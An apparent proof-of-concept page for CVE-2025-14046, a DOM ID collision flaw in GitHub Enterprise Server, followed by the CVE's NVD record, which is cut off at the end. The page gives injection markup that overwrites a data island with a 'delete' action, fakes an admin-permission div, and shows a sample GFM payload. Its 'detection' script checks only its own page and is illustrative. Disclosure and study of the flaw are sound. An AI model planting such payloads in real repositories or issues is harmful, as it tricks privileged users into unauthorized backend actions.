CVE-2025-14046

<!-- CVE-2025-14046 PoC: DOM Element ID Collision --> <!-- This PoC demonstrates the HTML injection technique that can overwrite server-initialized data islands --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14046 PoC</title> </head> <body> <!-- Attack Scenario: 1. Attacker creates a malicious repository or issue with crafted HTML content 2. When a privileged user views the content, the injected HTML is rendered 3. The injected DOM elements with colliding IDs overwrite server data islands 4. The application state is manipulated, leading to unauthorized backend requests --> <!-- Example: Overwriting a server-initialized data island --> <script type="application/json" id="server-state" data-value="malicious-value"> { "project_id": "12345", "action": "delete", "authenticated_user": "victim-admin" } </script> <!-- Alternative injection vector using data attributes --> <div id="gh-data-owner" data-owner-id="attacker-controlled-id" data-permissions="admin"> </div> <!-- Real-world exploitation would involve: - Crafted Markdown/GitHub Flavored Markdown with HTML tags - Malicious pull request/issue descriptions - Wiki pages with embedded HTML - Comments containing conflicting element IDs Example GFM payload: <script id="app-settings" type="application/json">{"malicious": true}</script> --> <script> // Detection script to verify vulnerability presence console.log('CVE-2025-14046 Detection Script'); const stateElement = document.getElementById('server-state'); if (stateElement && stateElement.dataset.value) { console.log('Potential vulnerable state element detected'); console.log('Value:', stateElement.dataset.value); } </script> </body> </html>

{"cve": {"id": "CVE-2025-14046", "sourceIdentifier": "[email protected]", "published": "2025-12-11T18:16:19.253", "lastModified": "2025-12-19T19:47:36.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed user-supplied HTML to inject DOM elements with IDs that collided with server-initialized data islands. These collisions could overwrite or shadow critical application state objects used by certain Project views, leading to unintended server-side POST requests or other unauthorized backend interactions. Successful exploitation requires an attacker to have access to the target GitHub Enterprise Server instance and to entice a privileged user to view crafted malicious content that includes conflicting HTML elements. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18.3, 3.17.9, 3.16.12, 3.15.16, and 3.14.21."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.14.21", "matchCriteriaId": "1EF86D06-BA41-42A4-B1AF-5398BB75D321"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15.0", "versionEndExcluding": "3.15.16", "matchCriteriaId": "EC5DF0C2-A9E5-46DC-8C09-F2FC55453734"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16.0", "versionEndExcluding": "3.16.12", "matchCriteriaId": "F6EAE627-E160-4656-AF99-554C807B3B3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.17.0", "versionEndExcluding": "3.17.9", "matchCriteriaId": "1B09055B-2885-4BD6-85A7-AEA22FBF98FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.0", "versionEndExcluding": "3.18.3", "matchCriteriaId": "C90038CC-CAF1-4B27-9FB6-BB5BB35C1B48"}]}]}], "references": [{"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.14.21", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.15.16", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.16.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.17.9", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.1 ... (truncated)